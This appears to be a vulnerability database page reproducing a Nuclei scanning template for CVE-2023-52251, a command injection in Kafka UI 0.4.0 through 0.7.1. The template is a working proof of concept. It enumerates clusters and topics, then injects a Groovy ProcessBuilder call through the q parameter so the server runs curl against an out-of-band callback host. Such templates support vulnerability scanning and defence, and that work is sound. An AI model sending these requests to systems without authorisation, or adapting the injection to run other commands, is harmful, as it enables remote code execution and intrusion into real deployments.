CVE-2023-52251: Kafka UI 0.7.1 Command Injection

日期: 2025-08-01 | 影响软件: Kafka UI | POC: 已公开

漏洞描述

An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.

PoC代码[已公开]

id: CVE-2023-52251

info:
  name: Kafka UI 0.7.1 Command Injection
  author: yhy0,iamnoooob
  severity: high
  description: |
    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
  reference:
    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
    - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-52251
    cwe-id: CWE-94
    epss-score: 0.93207
    epss-percentile: 0.99792
    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: provectus
    product: ui
    framework: kafka
    fofa-query: icon_hash="-1477045616"
  tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm

http:
  - raw:
      - |
        GET /api/clusters HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: cluster-name
        internal: true
        json:
          - '.[0].name'

  - raw:
      - |
        GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: topic-name
        internal: true
        json:
          - '.topics[].name'

  - raw:
      - |
        @timeout 20s
        GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - 'Assigning partitions'
# digest: 4a0a004730450220359f93dbaed00a5505f13472e64831ca92423e90155a61c6a52f5ff0f45d48680221009e89e54d2430748014d9907a34ba01937eaa773e05e38b624a21a135bcaf39f9:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-52251.yaml